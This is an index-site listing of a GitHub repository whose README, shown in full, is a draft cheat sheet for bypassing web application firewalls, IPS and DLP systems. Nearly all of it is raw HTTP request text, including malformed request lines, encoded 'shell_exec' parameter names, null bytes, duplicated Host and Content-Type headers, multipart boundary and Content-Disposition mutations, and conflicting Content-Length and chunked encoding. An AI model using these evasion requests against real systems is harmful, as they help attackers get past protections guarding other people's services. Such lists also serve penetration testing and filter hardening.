Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet

Another way to bypass WAF Cheat Sheet (draft)
https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet

Last synced: 21 days ago
JSON representation

Another way to bypass WAF Cheat Sheet (draft)

Host: GitHub
URL: https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet
Owner: Bo0oM
Created: 2018-11-28T19:34:02.000Z (about 6 years ago)
Default Branch: master
Last Pushed: 2018-11-28T20:34:17.000Z (about 6 years ago)
Last Synced: 2024-02-11T21:18:47.612Z (10 months ago)
Homepage:
Size: 2.93 KB
Stars: 409
Watchers: 20
Forks: 66
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-hacking-lists - Bo0oM/WAF-bypass-Cheat-Sheet - Another way to bypass WAF Cheat Sheet (draft) (Others)

README

        # WAF/IPS/DLP bypass Cheat Sheet

Another way to bypass

**Add \r\n before the first line HTTP request**  

```

GET /login HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```

**Writing the method with a lowercase (Apache)**

```

get /login HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```

**Tabs before the method (IIS)**

```

    GET /login.php HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```

**GET /login?shell_exec HTTP/1.1**

```

GET /login?shell.exec HTTP/1.1

GET /login?shell[exec HTTP/1.1

GET /login?shell%5bexec HTTP/1.1

GET /login?shell%2eexec HTTP/1.1

GET /login?shell%5fexec HTTP/1.1

GET /login?shell%20exec HTTP/1.1

```

**GET /login.php?pam_param=test3**

```

GET /login.php?pam_param=test1&pam[param=test2&pam%5bparam=test3

```

**GET /login.php?hello=world HTTP/1.1**

```

GET /login.php?hello%00another_text=world HTTP/1.1

```

**HTTP Request - absoluteURI**

```

GET http://localhost/login.php HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```

**Double host header**

```

GET /login.php HTTP/1.1

Host: favoritewaf.com

Host: localhost

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```

**Host with lowercase**

```

GET /login.php HTTP/1.1

host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```

**Host without space**

```

GET /login.php HTTP/1.1

Host:favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```

**Host with tab**

```

GET /login.php HTTP/1.1

Host:	favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```

**Host with addition symbols**

/

:

\x00

\x20

\x09

\xad (IIS)

Example:

```

GET /login.php HTTP/1.1

Host: favoritewaf.com:12345

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```

```

GET /login.php HTTP/1.1

Host: favoritewaf.com ignored.text

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```

**Content-Type with another text** 

```

POST /login.php HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Content-Type: application/another-text/+++x-www-form-urlencoded

hello=world

```

**HTTP request with incorrect Content-Length (more data than specified)**

```

GET /login.php HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Content-Length: 1

AAAAAAAA

```

**Double Content-Type**

```

Content-Type: multipart/form-data; boundary=ZZZ

Content-Type: multipart/form-data; boundary=AAA

```

**Content-Disposition mutation**

```

GET /login.php HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: Keep-Alive

Content-Type: multipart/form-data; boundary=--------1218108630

----------1218108630

Content-Disposition: form-data; name="hello"

world

----------1218108630--

```

```

Content-Disposition: form-data; name="hello"

Content-Disposition: form-data; name="hello

Content-Disposition: form-data; name="hello"world"

Content-Disposition: attachment; name="hello"

```

```

Content-Type: multipart/form-data; boundary=x

--x

Content-Disposition:

test1;

--x

test2;

--x--

test3;

name="hello"

world

```

**Boundary mutation**

**PHP**

```

Content-Type: multipart/form-data; myfavoriteboundaryis=X; boundary=Hello;

==

Content-Type: multipart/form-data; boundary=X;

```

**Nullbyte**

```

Content-Type: multipart/form-data; boundary=HELLO\x00XXXXXXXXX

==

Content-Type: multipart/form-data; boundary=HELLO

```

**Ignored Content-Length**

```

Content-Type: application/x-www-form-urlencoded

Content-Length: 11

hello=world

```

==

```

Content-Length: 22

Transfer-Encoding: chunked

0B

hello=world

0

```

==

```

Content-Type: application/x-www-form-urlencoded

Content-Length: 0

Transfer-Encoding: chunked

3

hel

3

lo=

3

wor

2

ld

0

```